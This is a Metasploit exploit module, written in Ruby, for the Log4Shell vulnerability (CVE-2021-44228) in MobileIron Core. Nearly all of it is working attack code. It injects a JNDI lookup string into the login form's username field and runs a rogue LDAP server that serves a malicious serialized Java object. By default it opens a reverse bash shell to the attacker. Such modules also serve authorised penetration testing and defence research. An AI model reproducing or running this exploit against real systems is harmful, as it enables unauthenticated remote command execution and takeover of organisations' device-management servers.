MobileIron Log4Shell Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Log4Shell  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(_info = {})  
super(  
'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',  
'Description' => %q{  
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server  
will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS  
command execution in the context of the tomcat user.  
  
This module will start an LDAP server that the target will need to connect to.  
},  
'Author' => [  
'Spencer McIntyre', # JNDI/LDAP lib stuff  
'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff  
'rwincey', # discovered log4shell vector in MobileIron  
'jbaines-r7' # wrote this module  
],  
'References' => [  
[ 'CVE', '2021-44228' ],  
[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],  
[ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],  
[ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]  
],  
'DisclosureDate' => '2021-12-12',  
'License' => MSF_LICENSE,  
'DefaultOptions' => {  
'RPORT' => 443,  
'SSL' => true,  
'SRVPORT' => 389,  
'WfsDelay' => 30  
},  
'Targets' => [  
[  
'Linux', {  
'Platform' => 'unix',  
'Arch' => [ARCH_CMD],  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_bash'  
}  
},  
]  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'AKA' => ['Log4Shell', 'LogJam'],  
'Reliability' => [REPEATABLE_SESSION],  
'RelatedModules' => [  
'auxiliary/scanner/http/log4shell_scanner',  
'exploit/multi/http/log4shell_header_injection'  
]  
}  
)  
register_options([  
OptString.new('TARGETURI', [ true, 'Base path', '/'])  
])  
end  
  
def wait_until(&block)  
datastore['WfsDelay'].times do  
break if block.call  
  
sleep(1)  
end  
end  
  
def check  
validate_configuration!  
  
vprint_status('Attempting to trigger the jndi callback...')  
  
start_service  
res = trigger  
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?  
  
wait_until { @search_received }  
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')  
ensure  
cleanup_service  
end  
  
def build_ldap_search_response_payload  
return [] if @search_received  
  
@search_received = true  
  
return [] unless @exploiting  
  
print_good('Delivering the serialized Java object to execute the payload...')  
build_ldap_search_response_payload_inline('CommonsBeanutils1')  
end  
  
def trigger  
@search_received = false  
  
send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),  
'headers' => {  
'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"  
},  
'encode' => false,  
'vars_post' => {  
'j_username' => log4j_jndi_string,  
'j_password' => Rex::Text.rand_text_alphanumeric(8),  
'logincontext' => 'employee'  
}  
)  
end  
  
def exploit  
validate_configuration!  
@exploiting = true  
start_service  
res = trigger  
fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?  
fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302  
  
wait_until { @search_received && (!handler_enabled? || session_created?) }  
handler  
end  
end  
`